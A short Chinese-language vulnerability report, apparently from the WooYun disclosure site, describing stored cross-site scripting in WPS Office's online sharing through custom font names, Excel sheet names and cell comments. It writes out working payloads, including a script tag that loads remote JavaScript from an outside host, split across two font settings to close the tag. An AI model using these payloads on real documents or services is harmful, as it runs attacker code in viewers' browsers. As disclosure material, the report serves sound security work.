WooYun.org

我前几天看到wps嵌入一个在web的线模板(之前没接触过wps)，我第一反应就是这不安全，果断有漏洞可寻。
今天下载了wps测试。
1、office---所有字体名称导致xss
模板没有，超链接亦没有，我就看看字体，发现，可以自定义字体。拿">'><iframe>试，真的有漏洞。
在插入脚本时
"><script/src=//1cc.cc/l3>
发现执行不了，换了浏览器亦不行。但脚本已经插入到页面，考虑到是标签闭合的原因，于是就设置了两组
如图
在汉字里设置字体为
"><script/src=//1cc.cc/l3>

在英文里设置字体为
</script>

这样就闭合了，然后分享保存到云端，经测试成功。
演示：http://qing.wps.cn/p/9506637

2、excel
①如果sheet名为代码，web浏览时会执行。

②如果单元格的标注为代码，web浏览时会执行

演示：http://qing.wps.cn/l/11dfd221c7d64f1c980b8be152b9b8fa
3、ppt 所有字体导致xss
不再演示。